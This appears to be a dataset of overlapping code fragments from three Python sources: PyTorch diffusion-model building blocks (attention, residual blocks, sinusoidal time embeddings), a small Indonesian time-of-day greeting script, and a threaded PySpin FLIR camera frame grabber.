act_cfg (dict, optional): Config for the activation layer.", "in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels)", "k, v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight =", "Args: in_channels (int): Number of channels of the input feature map. embedding_channels (int):", "(str, optional): Embedding mode for the time embedding. Defaults to 'sin'. embedding_cfg (dict,", "in_channels (int): Number of channels of the input feature map. embedding_channels (int) Number", "y) x = self.conv_2(x) return x + shortcut def init_weights(self): # apply zero", ": Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if", "denoising network. If `in_channels` not equals to `out_channels`, a learnable shortcut with conv", "inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to", "NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding results will be", ": Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x", "class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to each other.", "self.norm(x) x = x * (1 + scale) + shift else: x =", "Defaults to None. act_cfg (dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU',", "scale) + shift else: x = self.norm(x + embedding) return x @MODULES.register_module() class", "mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch < 1.6.0, found", "Linear Unit (SiLU) function, element-wise. The SiLU function is also known as the", "= torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x):", "norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1)", "= True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward", "== 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def", "embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg),", "https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the input feature map. num_heads", "x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after attention. \"\"\" b,", "f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward function", "The config for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional):", "= self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut def init_weights(self): #", "layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of Embedding", "tensor. y (torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor :", "norm_cfg (dict, optional): Config for normalization layer. 
Default to ``dict(type='GN', num_groups=32)`` \"\"\" def", "scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x *", "nearest interpolation operation. Args: in_channels (int): Number of channels of the input feature", "one per batch element. dim (int): The dimension of the embedding. max_period (int,", "The kernel size for the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self,", "``10000``. Returns: torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\" half = dim", "Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults to None.", "act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None else out_channels", "(dict, optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self,", "] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding =", "torch.Tensor : Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None]", "max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor", "(int): Number of channels of the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm", "embedding. 1-D tensor shape as ``[bz, ]``, one per batch element. dim (int):", "of the ResBlock. If not defined, the output channels will equal to the", "inplace def forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor.", "layer, reference to Two level embedding. First embedding time by an embedding function,", "weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward function for", "of the dropout layers. out_channels (int, optional): Number of output channels of the", "None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 =", "the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the input", "conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2)", "the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float):", "number of the input feature map. embedding_channels (int): The channel number of the", "1) def forward(self, x): \"\"\"Forward function for upsampling operation. Args: x (torch.Tensor): Feature", "attention. \"\"\" b, c, *spatial = x.shape x = x.reshape(b, c, -1) qkv", "embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of", "for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config", "torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module):", "for downsample operation. Args: in_channels (int): Number of channels of the input feature", "with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample", "extra input. 
Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in", "x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The", "layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__()", "@ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU", "feature map. Returns: torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial =", "x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut def init_weights(self):", "self.inplace = inplace def forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor):", "the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size", "layer after the nearest interpolation operation. Args: in_channels (int): Number of channels of", "input (bool, optional): Use inplace operation or not. Defaults to `False`. \"\"\" def", "dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time embedding layer. Args:", "added with the input before normalization operation. Defaults to True. \"\"\" def __init__(self,", "Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None,", "x = x * (1 + scale) + shift else: x = self.norm(x", "default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 =", "if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward function. Args:", "class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function", "__init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels,", "2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling", "num_groups=32)``. act_cfg (dict, optional): The config for the activation layers. Defaults to ``dict(type='SiLU',", "The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional):", "in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k,", "@MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to each", "dimension of the embedding. max_period (int, optional): Controls the minimum frequency of the", "frequency of the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape as", "Defaults to `None`. norm_cfg (dict, optional): The config for the normalization layers. Defaults" ]
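As a quick sanity check on the sinusoidal embedding above, here is a minimal, self-contained sketch (assuming only `torch` and `numpy`, without the mmgen registry) that reproduces the same math and verifies the documented `[bz, dim]` output shape:

import numpy as np
import torch


def sinusoidal_embedding(timesteps, dim, max_period=10000):
    # same math as TimeEmbedding.sinusodial_embedding above
    half = dim // 2
    freqs = torch.exp(
        -np.log(max_period) *
        torch.arange(start=0, end=half, dtype=torch.float32) / half
    ).to(device=timesteps.device)
    args = timesteps[:, None].float() * freqs[None]
    embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)
    if dim % 2:
        embedding = torch.cat(
            [embedding, torch.zeros_like(embedding[:, :1])], dim=-1)
    return embedding


t = torch.randint(0, 1000, (4, ))       # one timestep per batch element
emb = sinusoidal_embedding(t, dim=128)  # -> shape [4, 128]
assert emb.shape == (4, 128)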
[ "jam < 12: # selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\")", "12 print(\"Selamat pagi!\") elif jam >= 12 and jam < 17: # selama", "and jam < 17: # selama jam di antara 12 s.d. 17 #", "5 <= jam < 12: # selama jam di antara 5 s.d. 12", "17 print(\"Selamat siang!\") elif jam >= 17 and jam < 19: # selama", "jam = 13 if 5 <= jam < 12: # selama jam di", "selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12", "# selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >=", "siang!\") elif jam >= 17 and jam < 19: # selama jam di", "di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam", "<= jam < 12: # selama jam di antara 5 s.d. 12 print(\"Selamat", "pagi!\") elif jam >= 12 and jam < 17: # selama jam di", "s.d. 17 # simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif", "17: # selama jam di antara 12 s.d. 17 # simplified: elif 12", "# selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain", "<= jam < 17 print(\"Selamat siang!\") elif jam >= 17 and jam <", "12 <= jam < 17 print(\"Selamat siang!\") elif jam >= 17 and jam", "5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam < 17:", "elif jam >= 17 and jam < 19: # selama jam di antara", "selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi", "simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam >= 17", "< 17: # selama jam di antara 12 s.d. 17 # simplified: elif", "# simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam >=", "jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di", "12 s.d. 17 # simplified: elif 12 <= jam < 17 print(\"Selamat siang!\")", "17 # simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam", "jam >= 17 and jam < 19: # selama jam di antara 17", "antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam <", "13 if 5 <= jam < 12: # selama jam di antara 5", "jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and", "# selama jam di antara 12 s.d. 17 # simplified: elif 12 <=", "elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam >= 17 and", "jam < 17: # selama jam di antara 12 s.d. 17 # simplified:", "antara 12 s.d. 17 # simplified: elif 12 <= jam < 17 print(\"Selamat", "jam >= 12 and jam < 17: # selama jam di antara 12", "di antara 12 s.d. 17 # simplified: elif 12 <= jam < 17", "elif jam >= 12 and jam < 17: # selama jam di antara", "antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di atas print(\"Selamat", "s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam < 17: #", "jam di antara 12 s.d. 17 # simplified: elif 12 <= jam <", "< 19: # selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else:", "print(\"Selamat pagi!\") elif jam >= 12 and jam < 17: # selama jam", "17 and jam < 19: # selama jam di antara 17 s.d. 19", "jam < 17 print(\"Selamat siang!\") elif jam >= 17 and jam < 19:", "= 13 if 5 <= jam < 12: # selama jam di antara", "if 5 <= jam < 12: # selama jam di antara 5 s.d.", "print(\"Selamat siang!\") elif jam >= 17 and jam < 19: # selama jam", ">= 12 and jam < 17: # selama jam di antara 12 s.d.", "< 12: # selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif", "and jam < 19: # selama jam di antara 17 s.d. 19 print(\"Selamat", "di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di atas", "19: # selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: #", "12 and jam < 17: # selama jam di antara 12 s.d. 17", "selama jam di antara 12 s.d. 
17 # simplified: elif 12 <= jam", "< 17 print(\"Selamat siang!\") elif jam >= 17 and jam < 19: #", "jam < 19: # selama jam di antara 17 s.d. 19 print(\"Selamat sore!\")", ">= 17 and jam < 19: # selama jam di antara 17 s.d.", "17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di atas print(\"Selamat malam!\")", "12: # selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam" ]
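The `# simplified:` comment generalizes: each branch can use a chained comparison instead of an explicit `and`. A small hypothetical refactor of the same ladder into a reusable function:

def greeting(jam):
    # same hour boundaries as the if/elif ladder above
    if 5 <= jam < 12:
        return "Selamat pagi!"
    if 12 <= jam < 17:
        return "Selamat siang!"
    if 17 <= jam < 19:
        return "Selamat sore!"
    return "Selamat malam!"


print(greeting(13))  # -> Selamat siang!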
[ "= [] for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,),", "for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame", "self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame,", "FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is", "def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time()", "= None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def", "now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 /", "class FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self,", "__init__(self, serial=None): if serial is None: raise Exception(\"Please provide a valid FLIR camera", "get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration", "def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height)", "self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return", "self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock =", "return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self,", "self._is_running = True self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i)", "= False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition()", "self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False for thread in", "self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False", "cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps", "def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height =", "= self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop()", "self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del", "self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system", "get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame =", "self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 
1): if (self._is_running", "args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False", "frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 *", "threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height", "set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration = now - self._last_frame_grab_time", "a valid FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list", "del self._system del self._serial def start(self, num_threads = 1): if (self._is_running is not", "camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera", "range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self):", "self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return", "def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del", "= frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99", "self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self,", "valid FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list =", ".01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is", "del self._serial def start(self, num_threads = 1): if (self._is_running is not True): self._is_running", "del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 1): if", "(self._is_running is not True): self._is_running = True self._threads = [] for i in", "None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock() def", "class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps =", "target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img", "0 def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width,", "get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions()", "self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time =", "self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del", "* self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self):", "self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide a valid", "(self._latest_camera_frame is not None): 
self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index", "while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img =", "self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self,", "= now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None):", "= 0 def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return", "threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None", "import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame =", "FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0", "def start(self, num_threads = 1): if (self._is_running is not True): self._is_running = True", "self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running =", "return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if serial is None:", "self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 1): if (self._is_running is", "self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True", ".99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now def", "duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 *", "self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self,", "for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start()", "None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self):", "import PySpin import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False", "number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial)", "in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def", "serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera =", "if serial is None: raise Exception(\"Please provide a valid FLIR camera serial number\")", "False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit()", "/ duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame", "self._camera.Height() 
self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if", "= serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width", "False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance()", "self._latest_camera_frame = frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps =", "None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock", "is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height", "del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def", "if (self._is_running is True): self._is_running = False for thread in self._threads: thread.join() del", "serial is None: raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial", "self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock:", "self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True):", "self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame):", "del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del", "def __init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while", "(1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None,", "with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height, width)", "_is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def", "(self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del", "self._is_running = False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is", "= False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not", "None: raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial = serial;", "0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return self._camera def", "self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 1):", "is True): self._is_running = False for thread in self._threads: thread.join() del self._threads if", "thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame =", "self._latest_camera_frame is not None, self._latest_camera_frame def 
__init__(self, serial=None): if serial is None: raise", "time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time =", "stop(self): if (self._is_running is True): self._is_running = False for thread in self._threads: thread.join()", "index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame =", "= .99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now", "* (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not", "self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running", "Exception(\"Please provide a valid FLIR camera serial number\") self._serial = serial; self._system =", "i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread)", "frame): self._latest_camera_frame = frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps", "is not None, self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please", "True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear()", "time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01", "self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class", "= threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running", "[] for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False)", "False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return", "self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now =", "self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del", "not True): self._is_running = True self._threads = [] for i in range(num_threads): worker", "return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self):", "True): self._is_running = False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame", "self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition()", "= self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous)", 
"self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited", "import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0", "def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide a valid FLIR", "True): self._is_running = True self._threads = [] for i in range(num_threads): worker =", "num_threads = 1): if (self._is_running is not True): self._is_running = True self._threads =", "worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if", "return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration =", "serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width =", "= self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False", "not None, self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide", "raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial = serial; self._system", "self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height, width) target.set_latest_frame(img)", "PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height =", "def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if serial", "= 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return self._camera", "= True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited", "self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited", "self._frame_grab_fps def 